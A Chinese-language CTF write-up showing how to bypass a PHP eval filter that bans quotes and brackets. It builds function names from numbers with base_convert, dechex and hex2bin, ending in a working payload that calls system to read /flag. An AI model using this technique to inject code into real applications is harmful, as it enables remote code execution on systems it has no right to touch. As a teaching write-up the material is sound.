目录
源代码分析
黑名单字符:单双引号(' ")、反引号(`)、中括号([ ])。这里说明几点:
- 单双引号的禁用说明字符串是无法使用的,可以用返回值为字符串的函数返回。
- 反引号的禁用说明无法使用命令执行,
- 中括号是用来访问数组的元素,可以用花括号({})代替。
白名单是一系列的数学函数。首先在里面寻找能够返回字符串的函数,利用 PHP 手册迅速排查:
能够返回字符串的函数有:
- base_convert:2到36进制之间的任意转换。
- decbin:十进制转到二进制。
- dechex:十进制转换为十六进制。
- decoct:十进制转换为八进制。
这四个函数的描述如下:
(1)base_convert
(2)decbin
(3)dechex
(4)decoct
值得注意是,base_convert 可以返回包含 a-z 的字符串,所以它能为我们提供任意一个函数的字符串名称,再利用 PHP 的动态调用函数特性(一个字符串加一个括号就能调用字符串指定的函数)来调用。
确定要构造的 payload
接下来确定要注入的代码的原始形态,这里是:$_GET[1]($_GET[2])。
主要的问题是 "_GET" 是被限制的,所以接下来的思路是通过上面四个函数把它构造出来。
由于只能传入 79 个字符,只用 base_convert 来构造字符串就会发现构造出来的 payload 长度超过限制。所以,需要另辟途径。
构造得到任意字符串的无字符串实参 payload
我们可以使用 hex2bin 将字符串的 16 进制形式转换成原始字符串,比如 0x5f474554 -> "_GET"。这个 hex2bin 不在白名单中,这可以用 base_convert 得到。(为什么要用 hex2bin,而不是 decbin?)
把 "hex2bin" 看成 36 进制,然后转换成 10 进制:
echo base_convert('hex2bin',36,10); // 37907361743
再倒过来,得到 "hex2bin":
echo base_convert(37907361743,10,36); // hex2bin
hex2bin 需要接收 "_GET" 的十六进制,即 5f474554:
echo bin2hex("_GET"); // 5f474554
echo hex2bin("5f474554"); // _GET
5f474554 以字符串类型传入,它必须由整型数字转换得到,可以用 dechex 函数:
echo hexdec("5f474554"); // 1598506324,整型
echo dechex(1598506324); // 5f474554,字符串
整个思路串起来:
echo base_convert(37907361743,10,36)(dechex(1598506324)); // _GET
如图:
首先是因为单双引号的禁用,所以我们要用某个函数返回目标字符串(即"_GET"),而这个函数必须接收"_GET"的其他数据格式,例如整型数字。类似:
func($number) --> "_GET"
但没有符合这样条件的函数,所以考虑能将某种进制的数字字符串转换成特定字符串的函数,类似:
func1(func2($number))
相当于
$func2($number) 整型数字 --> 某种进制的数字字符串
$func1($number_string) 某种进制的数字字符串 --> 特定字符串
符合条件的函数是 hex2bin(),因为 hex2bin() 接收的十六进制数字字符串("5f474554")可以由整型数字(1598506324)通过 dechex() 函数转换得到,而 hex2bin() 返回一个特定的字符串。
最终 payload:
/?c=1;${1}=base_convert(37907361743,10,36)(dechex(1598506324));$${1}{2}($${1}{3})&2=system&3=cat /flag
技巧
有几个技巧可以构造能得到任意字符串的无字符串实参 payload:
- hex2bin 和 dechex 两个函数配合
- base_convert 函数